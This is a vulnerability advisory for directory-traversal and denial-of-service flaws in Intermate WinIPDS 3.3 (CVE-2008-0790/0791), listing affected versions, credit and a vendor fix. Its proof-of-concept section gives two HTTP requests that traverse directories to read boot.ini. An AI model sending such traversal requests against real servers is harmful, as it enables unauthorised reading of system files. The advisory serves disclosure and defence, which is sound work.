WinIPDS Directory Traversal and Denial of Service Vulnerabilities
BID:27757
Info
WinIPDS Directory Traversal and Denial of Service Vulnerabilities
| Bugtraq ID: | 27757 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0791 CVE-2008-0790 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 12 2008 12:00AM |
| Updated: | Jul 06 2016 02:17PM |
| Credit: | Luigi Auriemma discovered these vulnerabilities. |
| Vulnerable: |
Intermate WinIPDS 3.3 rev. G52-33-021 |
| Not Vulnerable: |
Intermate WinIPDS 3.3 rev. G52-33-022 |
Discussion
WinIPDS Directory Traversal and Denial of Service Vulnerabilities
WinIPDS is prone to a directory-traversal vulnerability and a denial-of-service vulnerability.
Exploiting these issues will allow attackers to gain to sensitive information or crash the affected application, denying further service to legitimate users.
These issues affect WinIPDS 3.3 rev. G52-33-021; prior versions may also be affected.
WinIPDS is prone to a directory-traversal vulnerability and a denial-of-service vulnerability.
Exploiting these issues will allow attackers to gain to sensitive information or crash the affected application, denying further service to legitimate users.
These issues affect WinIPDS 3.3 rev. G52-33-021; prior versions may also be affected.
Exploit / POC
WinIPDS Directory Traversal and Denial of Service Vulnerabilities
The following proof-of-concept URIs are available:
GET /../../../../../boot.ini HTTP/1.0
or
POST /..\../..\../..\boot.ini HTTP/1.0
The following proof-of-concept URIs are available:
GET /../../../../../boot.ini HTTP/1.0
or
POST /..\../..\../..\boot.ini HTTP/1.0
Solution / Fix
WinIPDS Directory Traversal and Denial of Service Vulnerabilities
Solution:
The vendor has released a fix to address these issues. Please see the references for more information.
Solution:
The vendor has released a fix to address these issues. Please see the references for more information.
References
WinIPDS Directory Traversal and Denial of Service Vulnerabilities
References:
References: